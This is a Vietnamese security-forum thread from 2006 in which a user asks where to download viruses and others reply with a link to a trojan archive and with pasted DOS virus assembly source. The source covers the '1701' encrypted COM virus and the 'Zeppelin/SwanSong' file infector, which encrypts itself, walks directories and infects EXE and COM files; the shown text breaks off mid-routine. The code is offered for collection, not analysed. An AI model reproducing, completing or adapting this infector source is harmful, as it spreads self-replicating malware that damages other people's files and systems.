down virus - .:: HVAOnline ::.

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận virus, trojan, spyware, worm...

down virus

[Question] down virus	30/06/2006 10:01:17 (+0700) \| #1 \| 2404

format
Member

Joined: 29/06/2006 22:08:58
Messages: 29
Offline

Mình rất muốn sưu tầm virus
nhưng ko biết chỗ down
xin các bạn chỉ giúp

[Question] down virus	02/07/2006 03:01:30 (+0700) \| #2 \| 2948

jackly
Member

Joined: 26/06/2006 20:17:52
Messages: 11
Location: CHV
Offline

bạn xem bài " nơi lưu trữ trojan ... " đi bạn

[Question] down virus	02/07/2006 03:05:19 (+0700) \| #3 \| 2949

jackly
Member

Joined: 26/06/2006 20:17:52
Messages: 11
Location: CHV
Offline

mới thấy một cái link hay hay nè bạn http://www.hackpr.net/troyanos.php

[Question] down virus	02/07/2006 03:15:04 (+0700) \| #4 \| 2951

trojon
Member

Joined: 29/06/2006 22:36:06
Messages: 47
Offline

Một số mã nguồn virus mong rằng sẽ đáp ứng được 1 phần yêu cầu của bạn

PAGE 59,132

;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ 1701 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 11-Feb-92 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: none ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ

data_31e equ 27D1h ;*
data_36e equ 4CD6h ;*
data_39e equ 6950h ;*
data_45e equ 8848h ;*
data_50e equ 0BDF1h ;*
data_53e equ 0CBC7h ;*
data_55e equ 0EA36h ;*
data_58e equ 49F2h
data_59e equ 0B0E0h
data_60e equ 0BCF1h
data_61e equ 0EAEFh

seg_a segment byte public
assume cs:seg_a, ds:seg_a

org 100h

1701 proc far

start:
jmp loc_2
db 39 dup (0)
data_22 db 0 ; Data table (indexed access)
db 58 dup (0)
loc_2:
cli ; Disable interrupts
mov bp,sp
call sub_1

1701 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ

sub_1 proc near
pop bx
sub bx,131h
test cs:data_22[bx],1
jz $+11h ; Jump if zero
lea si,[bx+14Dh] ; Load effective addr
mov sp,682h
loc_4:
xor [si],si
xor [si],sp
inc si
dec sp
jnz loc_4 ; Jump if not zero
db 8Eh,0EBh,0E5h,0BDh, 62h,0F6h
db 0F7h, 06h,0EFh,0EEh,0EEh, 2Fh
db 0C2h,0E6h,0E6h,0E2h,0B1h, 11h
db 0EEh, 02h, 6Ch,0F8h, 36h,0EAh
db 3Bh,0DCh,0E0h,0C3h,0C2h,0C6h
db 0E6h,0C2h

locloop_5:
mov si,dx
push es
db 0F1h, 60h,0D4h,0ABh, 69h, 96h
db 0EEh,0EEh,0E2h, 0Bh, 06h,0DBh
db 0E2h
db 0E2h,0EEh,0EEh,0F2h,0FAh,0F6h
db 0F6h
loc_7:
db 0F2h,0F2h, 7Ah, 87h, 61h
loc_9:
test ah,[di-80h]
add byte ptr [bp+si-7171h],0F6h
jc loc_9 ; Jump if carry Set
div dl ; al, ah rem = ax/reg
db 0F2h,0EEh,0EEh,0E2h,0E3h, 1Bh
db 16h,0C2h
db 0C2h,0CEh
db 0CEh, 1Ah,0F2h,0F6h,0ADh, 73h
db 19h, 6Dh,0CFh,0ECh, 4Eh, 49h
db 92h,0C3h,0ECh, 47h, 49h,0A4h
db 0F3h,0D8h, 7Dh, 75h,0AAh,0EFh
db 4Dh,0E2h,0E3h,0C8h, 6Ch, 65h
db 0B8h,0EFh, 4Ch,0F0h,0F3h,0A5h
db 42h,0C2h, 3Fh, 2Fh, 56h, 3Dh
db 03h, 77h, 14h,0B9h,0FEh, 46h
db 3Eh, 0Eh,0C1h, 00h, 3Bh,0D3h
db 73h, 11h, 44h,0B7h, 97h,0E9h
db 94h,0F4h
db 19h,0F0h,0E9h,0DCh, 79h, 71h
db 0A0h,0F3h,0DCh, 31h, 61h, 90h
db 0C3h, 95h, 7Eh,0E3h,0F7h, 03h
db 0EFh, 79h, 31h,0ADh,0D8h, 7Bh
db 75h, 8Fh,0EFh,0CCh, 6Eh, 61h
db 85h,0E3h, 5Ah,0EEh, 1Eh, 7Ch
db 32h, 49h,0FEh, 12h, 73h,0B3h
db 0CDh,0CDh,0F7h, 9Dh, 07h,0FFh
db 80h,0DEh,0DCh, 87h,0E6h, 77h
db 8Bh,0F6h,0DCh
loc_14:
into ; Int 4 on overflow
db 9Bh,0EFh, 63h, 9Bh,0E0h,0ABh
db 0A0h, 9Bh,0E8h, 71h, 8Fh,0FEh
db 0BBh, 86h, 45h, 76h,0B5h,0C2h
db 4Eh, 0Bh, 8Bh, 4Ch, 07h,0E0h
db 45h,0C4h,0E4h,0F6h,0D0h, 7Bh
db 0C4h,0EFh,0EEh,0C4h, 69h,0F0h
db 0E5h,0E2h,0C4h, 4Dh,0EDh,0F2h
db 0D4h, 30h,0F0h,0F2h,0F2h, 43h
db 25h,0D2h, 48h, 43h, 05h,0EAh
db 47h, 80h,0CBh,0A1h, 46h,0A6h
db 7Dh, 2Fh, 3Fh,0CFh,0B5h,0D1h
db 1Dh,0E0h,0F1h,0B5h, 6Fh, 51h
db 20h,0F5h, 79h, 01h
db 4Fh
db 57h,0F4h, 33h, 3Dh, 66h,0C4h
loc_16:
dec bx
dec cx
mov dl,0C0h
lahf ; Load ah from flags
add ax,7EDCh
jns loc_14 ; Jump if not sign
db 0F3h, 7Fh, 61h,0C4h,0E3h, 11h
db 42h,0C8h, 6Eh,0ECh,0D8h,0EEh
db 0BFh, 7Ch, 33h,0D0h
db 7Bh,0E4h, 8Dh, 8Eh,0A4h, 44h
db 80h
db 86h, 82h,0D8h,0A8h, 02h,0FCh
db 0F3h
loc_19:
div byte ptr [bp+di+377Ch] ; al,ah rem = ax/data
lock jmp $-211h
sub_1 endp

db 6Bh, 51h,0C8h,0E3h, 51h,0EEh
db 0F3h, 4Bh, 53h,0F0h, 0Eh, 01h
db 6Ah,0C8h, 4Fh,0C4h, 42h,0C4h
db 92h
db 9
db 0E0h, 09h,0F4h,0DEh,0F6h,0F6h
db 0F2h,0DCh, 62h,0E0h,0F4h,0E2h
db 0F8h, 6Bh,0F4h,0FEh,0EDh,0E0h
db 0EDh, 4Ah,0D7h,0D3h, 3Fh,0D3h
db 11h,0BBh, 19h,0B9h, 87h, 07h
db 0CEh, 22h,0E7h,0FCh,0F2h, 46h
db 0DCh, 3Bh,0D3h, 73h, 17h, 2Ah
db 0E5h, 95h, 83h, 92h,0C8h, 63h
db 17h, 52h,0F5h, 87h,0ABh,0E8h
db 4Ah,0DAh,0FBh, 03h,0E3h,0ECh
db 4Fh,0D8h,0F9h,0C3h,0E0h
db 42h
db 0F4h,0CFh,0F7h, 4Eh,0DAh,0D7h
db 54h,0CCh,0E5h,0ECh,0F9h, 2Bh
db 0C3h,0FDh,0C0h, 6Eh,0FCh,0A5h
db 0F7h,0FEh, 19h,0F4h, 1Eh, 0Eh
loc_22:
jl loc_19 ; Jump if <
hlt ; Halt processor
mov dl,6Ah ; 'j'
dec word ptr ds:data_55e[si]
out 1Eh,ax ; port 1Eh ??I/O Non-standard
jc loc_22 ; Jump if carry Set
mov dl,0C0h
dec bp
mov sp,0C8E3h
inc bp
and bl,0C0h
sub sp,si
xchg ax,si
div di ; ax,dx rem=dx:ax/reg
db 0F2h, 4Ah,0D2h,0FBh, 0Fh,0E3h
db 0E8h, 4Fh,0DCh,0F1h,0CFh,0E0h
db 7Eh,0F4h
db 0C3h,0F7h,0ECh, 4Ah,0F2h,0CBh
db 58h, 5Fh,0E0h,0E8h,0FDh, 2Fh
db 0CFh,0F1h, 49h, 24h, 09h, 1Fh
db 65h, 0Ch, 8Eh,0F2h, 49h, 76h
db 16h, 28h,0FDh, 2Ch, 39h, 0Fh
db 4Dh, 58h,0A3h,0D8h, 36h,0F4h
db 0D9h,0EFh, 6Eh, 28h, 29h,0DAh
db 1Dh, 96h, 1Fh,0D2h,0F2h, 87h
db 1Eh, 6Ah,0A2h,0A1h, 9Fh, 9Ch
db 94h, 95h, 93h,0C0h,0DCh,0ECh
db 47h,0D8h,0B5h,0F3h,0D8h, 7Ah
db 0ECh,0BBh,0EFh,0E0h,0E5h, 5Ah
db 0E6h,0DBh, 2Fh,0C3h, 9Ch,0B8h
db 79h, 2Ah, 4Eh,0F6h,0A5h, 3Fh
db 0AFh,0A0h, 0Bh, 94h,0C5h, 87h
db 0ACh, 0Bh, 80h,0CBh,0F3h, 46h
db 0C9h,0F8h,0EDh, 48h,0C0h,0EFh
db 5Bh,0E1h,0E6h, 2Bh,0C3h, 90h
db 0D9h,0D5h, 33h, 87h,0C5h, 4Eh
db 0F0h,0B0h,0FDh, 07h,0F1h, 10h
db 0Bh,0E7h,0ECh, 61h, 85h
db 0CFh,0DCh, 7Bh,0E0h,0BBh,0F3h
db 46h,0D0h, 23h,0C3h,0CCh, 67h
db 0D8h,0CCh,0E3h,0A3h,0B4h, 87h
db 0F1h, 1Fh, 31h,0F2h,0DCh, 8Dh
db 37h, 48h, 04h, 01h, 76h, 0Ch
db 2Bh, 88h, 37h,0BEh,0F3h,0CDh
db 0Fh, 84h,0F1h, 07h, 5Dh,0E2h
db 0CCh, 66h,0D8h,0CCh,0E3h, 07h
db 9Bh,0FCh,0DCh
db 57h
loc_27:
mov bp,0F7F3h
xchg ax,di
aaa ; Ascii adjust
in al,dx ; port 0C0h, DMA-2 bas&add ch 0
stc ; Set carry flag
db 0C0h,0E9h
db 0C3h,0B6h, 29h, 76h,0F2h,0B1h
db 0D8h, 33h,0E4h,0B5h,0EFh, 23h
db 0C3h, 90h, 3Dh,0C8h, 6Bh,0ECh
db 0AFh,0EFh, 72h, 03h,0D6h, 00h
db 33h,0D5h,0FAh, 87h, 3Ah, 83h
db 0C5h,0B5h, 4Bh, 4Fh,0AFh
db 0FCh, 37h, 4Ah,0F4h
db 0CBh, 3Fh,0D3h, 9Ch, 50h, 69h
db 3Ah, 5Eh,0E4h,0A0h,0D1h, 27h
db 0DDh, 20h, 3Fh,0D7h, 1Eh,0A2h
db 0F1h,0BDh,0D6h, 7Ah,0C2h, 84h
db 0E8h, 49h,0CCh, 83h,0CFh,0DCh
db 79h,0E0h,0BDh,0F3h, 3Fh,0CFh
db 5Ah,0A2h,0D1h, 2Fh, 2Bh,0C3h
db 09h,0CFh, 7Eh
db 4Ah,0F2h,0B4h,0C5h, 3Bh,0C1h
db 0DCh,0C3h, 23h, 70h, 13h, 28h
db 0A3h, 49h, 0Fh, 0Bh, 0Ch, 0Dh
db 0D8h, 55h,0A2h,0F3h, 5Ah,0AEh
db 58h,0ADh,0E7h, 5Fh,0E1h,0E2h
db 23h,0CFh, 4Ah,0F3h,0A1h,0D8h
db 79h,0E4h, 8Dh,0CFh,0ECh, 49h
db 0C8h, 83h,0C3h, 0Fh,0EFh, 7Ah
db 0CCh, 3Fh,0D7h,0D8h, 79h,0FCh
db 0AFh,0EFh, 14h, 23h,0E1h, 93h
db 0E7h, 14h, 2Fh,0CEh, 87h,0F8h
db 4Eh,0F7h,0B1h,0DCh, 4Bh, 98h
db 0C5h, 83h, 4Bh,0A7h, 9Dh, 85h
db 0D3h,0D1h,0ACh,0A8h,0AFh,0ADh
db 0AAh, 6Fh, 07h, 5Ch, 1Ch,0FCh
db 0E8h
loc_33:
stc ; Set carry flag
mov cl,0B3h
mov sp,4BBEh
cmc ; Complement carry
db 0F6h, 4Dh, 86h,0F3h, 31h,0F9h
db 49h, 85h, 38h,0D7h,0C5h, 89h
db 85h
db 2Ch, 05h,0AAh,0E7h,0F1h, 79h
db 0E5h,0B6h,0E5h, 22h, 96h,0E4h
db 11h, 00h, 69h, 2Ch,0B4h,0ABh
db 0A9h,0E9h, 35h,0ECh,0F4h, 58h
db 58h, 52h, 0Dh, 00h,0BEh, 43h
db 03h, 81h,0D6h, 4Ch, 94h,0F7h
db 48h, 9Eh,0F2h, 57h,0E6h,0E2h
db 1Eh, 15h, 43h,0BBh,0BDh,0B0h
db 0E9h,0EDh, 31h,0A0h,0E8h,0A0h
db 78h, 08h, 38h,0E4h, 90h,0C7h
db 70h,0C2h,0C1h
db 0Ch
db 1Fh, 12h,0F1h,0F0h,0ACh,0F3h
db 79h, 1Eh, 18h,0E4h,0B6h,0E7h
db 19h, 6Ch,0FCh,0B6h,0EFh, 86h
db 0E0h, 4Ch, 2Ch,0F1h, 08h, 62h
db 26h, 8Ah,0F7h, 8Fh, 2Eh, 83h
db 0F7h, 79h, 62h, 5Ah,0F3h, 82h
db 0Dh, 5Fh
db 09h,0B4h,0F1h,0BCh, 21h,0B1h
db 0E0h,0B0h,0B1h, 65h, 36h, 78h
db 34h, 00h,0D0h,0A0h,0F3h, 78h
db 0CEh,0C1h, 00h, 17h, 26h,0C1h
db 0C4h, 94h,0CFh, 79h, 0Ah, 00h
db 0F0h,0A6h,0F3h, 11h, 60h,0E4h
db 0BAh,0E7h, 92h,0F0h, 58h, 34h
db 0EDh, 08h, 1Eh, 5Eh,0FEh, 87h
db 0FBh,0A6h, 0Fh, 77h,0F5h,0EAh
db 0AEh, 03h, 76h,0F5h, 85h, 31h
db 58h, 0Dh,0ADh,0A8h,0F5h,0B1h
db 2Dh,0B3h,0B3h, 6Dh,0E8h,0BEh
db 0E3h, 0Ch, 10h,0ABh, 10h, 00h
db 0AFh, 31h,0A2h, 2Ah,0AFh,0F6h
db 0C0h,0E2h, 38h, 24h,0A3h, 96h
db 0Dh,0CEh,0F2h, 82h,0FCh,0CEh
db 0D2h, 9Ah,0E8h,0DEh, 1Dh, 92h
db 0E4h, 1Ah, 21h, 17h, 2Dh,0CEh
db 42h, 84h,0F0h,0CEh, 2Dh,0F9h
db 8Ch, 7Bh, 41h, 7Eh, 45h, 9Ch
db 3Ah,0CEh, 8Eh, 7Ch, 2Ah, 0Dh
db 57h, 9Eh,0F2h,0D5h,0E8h, 8Eh
db 0E2h, 92h, 1Ch,0D1h
loc_37:
sub cx,[bx-7Eh]
db 0F2h,0B3h, 82h,0E3h,0C9h,0F4h
db 0A2h,0CEh,0B6h, 35h,0D9h, 4Dh
db 03h,0F1h, 1Ch, 77h,0FDh,0F2h
db 01h, 07h,0DCh, 51h,0B2h,0EFh
db 21h,0ABh
db 0Dh, 08h
db 24h,0E4h
db 0BDh,0EFh,0EAh,0ECh, 4Eh,0B6h
db 0F2h, 7Ch,0D6h,0ACh, 4Fh, 01h
db 1Ah,0A6h, 5Bh, 00h,0BFh,0F2h
db 49h,0C2h,0E7h, 41h,0F2h,0F4h
db 0BBh, 23h,0F2h,0BFh,0E1h, 66h
db 18h, 1Dh, 9Ah,0EAh, 7Ah,0E4h
db 0A5h,0F7h, 46h,0FDh, 03h,0DEh
db 4Ah,0E4h, 94h,0C7h, 04h,0C4h
db 9Ah,0CFh,0F2h, 35h,0F0h,0AEh
db 0F3h,0F2h, 5Eh,0D2h,0E5h, 96h
db 0D0h, 94h
db 0E1h, 0Bh, 0Eh,0EEh, 35h,0F4h
db 0AEh,0F7h,0F2h, 4Ah,0B2h, 8Dh
db 0F5h

locloop_40:
movsw ; Mov [si] to es:[di]
;* mov dx,offset loc_46 ;*
db 0BAh, 84h,0F0h
mov ax,ds:data_45e
cmpsb ; Cmp [si] to es:[di]
db 0F3h,0F7h, 56h,0A1h,0F3h, 10h
db 2Eh, 14h,0C4h,0B4h,0E7h, 41h
db 80h,0EFh, 4Fh, 96h,0F3h,0CDh
db 0F0h, 90h,0F3h,0B8h,0CDh, 63h
db 0A0h,0C7h, 2Eh,0A9h, 3Ch, 8Eh
db 45h, 02h,0C1h, 09h,0B1h, 53h
db 90h,0EFh, 3Fh, 02h,0D9h, 1Eh
db 90h,0E1h, 0Bh, 4Eh,0EEh, 72h
db 0FCh,0A1h,0F7h,0F0h, 52h, 5Ch
db 0Fh,0B6h, 02h,0EEh, 4Ah,0FCh
db 88h,0DEh,0AEh,0A1h,0F3h, 42h
db 0F6h, 1Ah,0B0h, 10h, 64h, 12h
db 0Ah, 60h, 18h, 0Ah,0F3h, 11h
db 9Ch, 20h, 1Ah,0EAh, 09h, 80h
db 3Fh, 6Ch, 9Bh,0C3h, 4Ah,0E0h
db 90h,0C3h, 48h,0C0h, 9Dh,0F3h
db 47h,0F6h, 08h, 34h,0C8h,0D8h
db 0BDh,0E3h, 95h,0B4h, 0Eh, 86h
db 1Ch,0D4h,0C8h,0A4h,0F3h, 83h
db 0BFh, 1Ah, 1Bh, 70h,0FCh,0AAh
db 6Ah, 72h, 78h,0F0h,0BDh, 70h
db 48h,0C8h,0C4h,0A5h,0F7h, 85h
db 0C5h, 06h,0A7h, 1Ch,0D8h,0C0h
db 0B0h,0E3h, 97h,0C0h, 06h, 3Ch
db 0Ch, 85h, 13h, 1Ah, 4Ch, 30h
db 30h, 0Ch, 2Ah,0F0h, 38h, 60h
db 97h,0CFh, 30h, 34h, 72h,0D0h
db 0A1h,0F3h, 0Fh, 10h, 20h, 52h
db 0C2h, 0Eh,0BBh, 1Ch, 1Ch, 28h
db 4Eh,0A7h,0F3h, 1Eh,0A3h, 0Ch
db 11h, 0Ah,0E7h, 8Dh,0FDh, 4Eh
db 0ECh,0A5h,0F5h, 09h, 58h,0F2h
db 0F0h, 82h,0F5h, 1Bh,0AEh, 11h
db 06h, 69h, 1Ch,0A8h, 92h,0E1h
db 0Bh,0BFh, 11h, 16h, 93h,0D2h
db 0Ah, 14h, 93h, 0Dh,0E0h, 34h
db 0C4h, 91h,0C7h,0CBh,0B7h, 96h
db 0E0h, 72h,0FCh,0A1h,0F7h,0F3h
db 0DCh, 11h,0E0h,0BCh,0E3h, 93h
db 0A3h,0FCh

locloop_41:
in al,0E0h ; port 0E0h, Memory encode reg2
db 0F1h,0FCh,0F5h,0A6h,0A5h,0A3h
db 0A0h,0D8h,0D9h,0D7h, 32h,0A6h
db 60h,0A2h, 23h,0EEh, 8Fh,0CFh
db 0CAh,0F2h, 85h,0F1h, 4Ah,0D6h
db 0EAh, 0Ah, 9Ch, 1Bh,0A6h, 41h
db 0BCh,0EFh, 4Dh, 92h,0F3h, 1Eh
db 61h, 0Ch, 4Ah,0CDh,0CEh, 2Ah
db 0ACh, 3Bh, 86h, 35h,0E4h,0AAh
db 0CFh, 81h,0F1h, 4Eh, 09h, 0Dh
db 51h, 8Ah,0EFh,0BFh,0BDh,0B8h
db 0BCh,0BBh,0B9h,0B6h,0E9h,0EDh
db 0DCh, 76h,0D0h,0A5h,0F3h,0F0h
db 20h,0FDh, 2Ch, 35h, 07h, 2Ch
db 0F4h, 08h, 59h,0F3h,0FAh, 82h
db 0EBh,0A2h,0A3h,0BCh, 5Ah,0C8h
db 2Fh,0C7h, 67h, 1Bh, 26h,0E9h
db 9Ch,0FFh, 85h,0F3h

locloop_42:
jbe loc_45 ; Jump if below or =
clc ; Clear carry flag
mov sp,0ECC8h
inc dx
loopnz locloop_41 ; Loop if zf=0, cx>0

retn
db 35h, 94h
db 97h
db 0AAh
loc_45:
esc 4,[bx+di] ; coprocessor escape
esc 0,cl ; coprocessor escape
db 0F3h,0E8h,0BDh, 56h,0AAh, 5Dh
db 8Dh,0E2h, 2Fh,0CFh,0B5h, 81h
db 0F1h, 0Fh,0F1h, 31h,0DCh, 48h
db 88h, 82h, 83h, 87h, 08h, 42h
db 8Ch, 91h,0BDh, 0Dh, 4Ch,0F6h
db 0F7h, 4Bh, 57h,0E8h, 12h, 11h
db 46h, 59h,0C5h,0E2h, 5Ch,0CDh
db 0EFh,0F1h,0C4h,0BDh,0F7h, 4Bh
db 70h,0C8h,0E8h,0F3h,0F7h,0E0h
db 0F7h,0CFh, 85h, 88h, 2Ch, 04h
db 7Ch, 2Eh, 42h,0B2h,0C1h, 3Ch
db 57h, 47h,0E4h, 2Bh,0C7h, 7Eh
db 0B2h, 5Ah,0A7h, 3Fh,0D3h,0AEh
db 6Bh,0FCh,0EDh, 7Ch,0BBh, 36h
db 0CCh, 7Ch,0BFh, 0Ah,0F5h,0C2h

seg_a ends

end start

;**************************************************************************
;
;The Zeppelin Virus September 25, 1992
;[MPC] Generated...
;Created by... pAgE
;As a TRiBuTe to John "back-beat" Bohnam, this "WEAK-DICK" ViRUS was made!
;Incidently. He died on this date in 1980! Got drunk and strangled on a
;CunT hAiR...oR wAs iT a tAmPoN???...Oh well, So goes RocK -n- RoLL...
;By the wAy<---That's whAt you sAy just beforE you bOrE the FuCK out of
;soMeoNe with anOthEr TRiViAl piEce of SHiT!!! These LiTTLe Up AnD LeTTeRS
;ThAt yA'll uSe, ArE a KicK....
;
;Okay, enough anti-social, suicidal, satan, sputum...On with the ViRUS...
; GeT'S in ThE bl00d DoEsn't it?------->^^^^^
;
;Here it is...
;It's not much, but in the hands off a knowledgeable Vx WRiTeR.......
;I'll keep workin' on it and see what I can do. In the mean time, have fun!
;I ReM'd out a lot of the ShIt iN here, So Joe LuNChmEaT doesn;t FrY hImSelF.
;
;But...If that's not good enough, well then - hEy! - BLoW mE!
;
;***************************************************************************

.model tiny ; Handy directive
.code ; Virus code segment
org 100h ; COM file starting IP

id = 'IS' ; ID word for EXE infections
entry_point: db 0e9h,0,0 ; jmp decrypt

decrypt: ; handles encryption and decryption
patch_startencrypt:
mov di,offset startencrypt ; start of decryption
mov si,(offset heap - offset startencrypt)/2 ; iterations
decrypt_loop:
db 2eh,81h,35h ; xor word ptr cs:[di], xxxx
decrypt_value dw 0 ; initialised at zero for null effect
inc di ; calculate new decryption location
inc di
dec si ; If we are not done, then
jnz decrypt_loop ; decrypt mo'
startencrypt:
call next ; calculate delta offset
next:
pop bp ; bp = IP next
sub bp,offset next ; bp = delta offset

cmp sp,id ; COM or EXE?
je restoreEXE
restoreCOM:
lea si,[bp+save3]
mov di,100h
push di ; For later return
movsb
jmp short restoreEXIT
restoreEXE:
push ds
push es
push cs ; DS = CS
pop ds
push cs ; ES = CS
pop es
lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw
movsw
movsw
restoreEXIT:
movsw

mov byte ptr [bp+numinfec],5 ; reset infection counter

mov ah,1Ah ; Set new DTA
lea dx,[bp+newDTA] ; new DTA @ DS smilie

X
int 21h

mov ah,47h ; Get current directory
mov dl,0 ; Current drive
lea si,[bp+origdir] ; DS:SI->buffer
int 21h
mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR

mov ax,3524h ; Get int 24 handler
int 21h ; to ES:BX
mov word ptr [bp+oldint24],bx; Save it
mov word ptr [bp+oldint24+2],es
mov ah,25h ; Set new int 24 handler
lea dx,[bp+offset int24] ; DS smilie

X->new handler
int 21h
push cs ; Restore ES
pop es ; 'cuz it was changed

dir_scan: ; "dot dot" traversal
lea dx,[bp+exe_mask]
call infect_mask
lea dx,[bp+com_mask]
call infect_mask
mov ah,3bh ; change directory
lea dx,[bp+dot_dot] ; "cd .."
int 21h
jnc dir_scan ; go back for mo!

done_infections:
;mov ah,2ah ; Get current date
;int 21h
;cmp dh,9 ; Check month
;jb act_two
;cmp dl,25 ; Check date
;jb act_two
;cmp cx,1992 ; Check year
;jb act_two
;cmp al,0 ; Check date of week
;jb activate

;mov ah,2ch ; Get current time
;int 21h
;cmp dl,50 ; Check the percentage
jbe activate

exit_virus:
mov ax,2524h ; Restore int 24 handler
lds dx,[bp+offset oldint24] ; to original
int 21h
push cs
pop ds

mov ah,3bh ; change directory
lea dx,[bp+origdir-1] ; original directory
int 21h

mov ah,1ah ; restore DTA to default
mov dx,80h ; DTA in PSP
cmp sp,id-4 ; EXE or COM?
jz returnEXE
returnCOM:
int 27h
retn ; 100h is on stack
returnEXE:
pop es
pop ds
int 21h
mov ax,es ; AX = PSP segment
add ax,10h ; Adjust for PSP
add word ptr cs:[bp+jmpsave+2],ax
add ax,word ptr cs:[bp+stacksave+2]
cli ; Clear intrpts for stack manipulation
mov sp,word ptr cs:[bp+stacksave]
mov ss,ax
sti
db 0eah ; jmp ssss:oooo
jmpsave dd ? ; Original CS:IP
stacksave dd ? ; Original SS:SP
jmpsave2 db ? ; Actually four bytes
save3 db 0cdh,20h,0 ; First 3 bytes of COM file
exe_mask db '*.exe',0
com_mask db '*.com',0
stacksave2 dd ?

activate proc far

start:
jmp short loc_1
db 90h
data_2 db 0
data_3 dw 216h
db 2
data_4 dw 0
db 'Ripped this Motherfucker off'
db 1Ah
data_5 db 'SHIT!!! Wont work....', 0Dh, 0Ah
db '$'
loc_1:

mov ax,0003h ; stick 3 into ax.
int 10h ; Set up 80*25, text mode. Clear the screen, too.
mov ah,0Fh
int 10h ; Video display ah=functn 0Fh
; get state, al=mode, bh=page
; ah=columns on screen
mov bx,0B800h
cmp al,2
je loc_2 ; Jump if equal
cmp al,3
je loc_2 ; Jump if equal
mov data_2,0
mov bx,0B000h
cmp al,7
je loc_2 ; Jump if equal
mov dx,offset data_5 ; ('Unsupported Video Mode')
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
retn
loc_2:
mov es,bx
mov di,data_4
mov si,offset data_6
mov dx,3DAh
mov bl,9
mov cx,data_3
cld ; Clear direction
xor ax,ax ; Zero register

locloop_4:
lodsb ; String [si] to al
cmp al,1Bh
jne loc_5 ; Jump if not equal
xor ah,80h
jmp short loc_20
loc_5:
cmp al,10h
jae loc_8 ; Jump if above or =
and ah,0F0h
or ah,al
jmp short loc_20
loc_8:
cmp al,18h
je loc_11 ; Jump if equal
jnc loc_12 ; Jump if carry=0
sub al,10h
add al,al
add al,al
add al,al
add al,al
and ah,8Fh
or ah,al
jmp short loc_20
loc_11:
mov di,data_4
add di,data_1e
mov data_4,di
jmp short loc_20
loc_12:
mov bp,cx
mov cx,1
cmp al,19h
jne loc_13 ; Jump if not equal
lodsb ; String [si] to al
mov cl,al
mov al,20h ; ' '
dec bp
jmp short loc_14
loc_13:
cmp al,1Ah
jne loc_15 ; Jump if not equal
lodsb ; String [si] to al
dec bp
mov cl,al
lodsb ; String [si] to al
dec bp
loc_14:
inc cx
loc_15:
cmp data_2,0
je loc_18 ; Jump if equal
mov bh,al

locloop_16:
in al,dx ; port 3DAh, CGA/EGA vid status
rcr al,1 ; Rotate thru carry
jc locloop_16 ; Jump if carry Set
loc_17:
in al,dx ; port 3DAh, CGA/EGA vid status
and al,bl
jnz loc_17 ; Jump if not zero
mov al,bh
stosw ; Store ax to es:[di]
loop locloop_16 ; Loop if cx > 0

jmp short loc_19
loc_18:
rep stosw ; Rep when cx >0 Store ax to es:[di]
loc_19:
mov cx,bp
loc_20:
jcxz loc_new_25 ; Jump if cx=0
loop locloop_4 ; Loop if cx > 0
loc_new_25:

mov si,offset data00 ; SI points to data
get_note: mov bx,[si] ; Load BX with the frequency
or bx,bx ; Is BX equal to zero?
je play_tune_done ; If it is we are finished

mov ax,034DDh ;
mov dx,0012h ;
cmp dx,bx ;
jnb new_note ;
div bx ; This bit here was stolen
mov bx,ax ; from the Turbo C++ v1.0
in al,061h ; library file CS.LIB. I
test al,3 ; extracted sound() from the
jne skip_an_or ; library and linked it to
or al,3 ; an .EXE file, then diassembled
out 061h,al ; it. Basically this turns
mov al,0B6h ; on the speaker at a certain
out 043h,al ; frequency.
skip_an_or: mov al,bl ;
out 042h,al ;
mov al,bh ;
out 042h,al ;

mov bx,[si + 2] ; BX holds duration value
xor ah,ah ; BIOS get time function
int 1Ah
add bx,dx ; Add the time to the length
wait_loop: int 1Ah ; Get the time again (AH = 0)
cmp dx,bx ; Is the delay over?
jne wait_loop ; Repeat until it is
in al,061h ; Stolen from the nosound()
and al,0FCh ; procedure in Turbo C++ v1.0.
out 061h,al ; This turns off the speaker.

new_note: add si,4 ; SI points to next note
jmp short get_note ; Repeat with the next note
play_tune_done:
activate endp

jmp exit_virus

creator db '[pAgE]',0 ; YOU REALLY SHOULD TAKE THIS
virusname db '[SwanSong]',0 ; BULLSHIT OUT OF HERE!!!
author db 'pAgE',0 ; WHY NOT HOLD UP A SIGN!!!

infect_mask:
mov ah,4eh ; find first file
mov cx,7 ; any attribute
findfirstnext:
int 21h ; DS smilie

X points to mask
jc exit_infect_mask ; No mo files found

mov al,0h ; Open read only
call open

mov ah,3fh ; Read file to buffer
lea dx,[bp+buffer] ; @ DS smilie

X
mov cx,20h ; 1Ah bytes
int 21h

mov ah,3eh ; Close file
int 21h

cmp word ptr [bp+buffer],'ZM'; EXE?
jz checkEXE ; Why yes, yes it is!
checkCOM:
mov ax,word ptr [bp+newDTA+1ah] ; Filesize in DTA
cmp ax,(heap-decrypt) ; Is it too small?
jb find_next

mov bx,word ptr [bp+buffer+1] ;get jmp location
add bx,(heap-decrypt+1) ; Adjust for virus size
cmp ax,bx
je find_next ; already infected
jmp infect_com
checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected?
jnz infect_exe
find_next:
mov ah,4fh ; find next file
